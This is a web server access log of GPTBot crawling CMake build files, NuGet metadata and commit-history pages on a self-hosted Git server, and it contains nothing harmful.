"/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12876] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:14:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:14:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11876] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21045] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11067] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10280] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25621] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10659] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10662] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10003] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14725] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14724] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10656] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:14:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11080] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 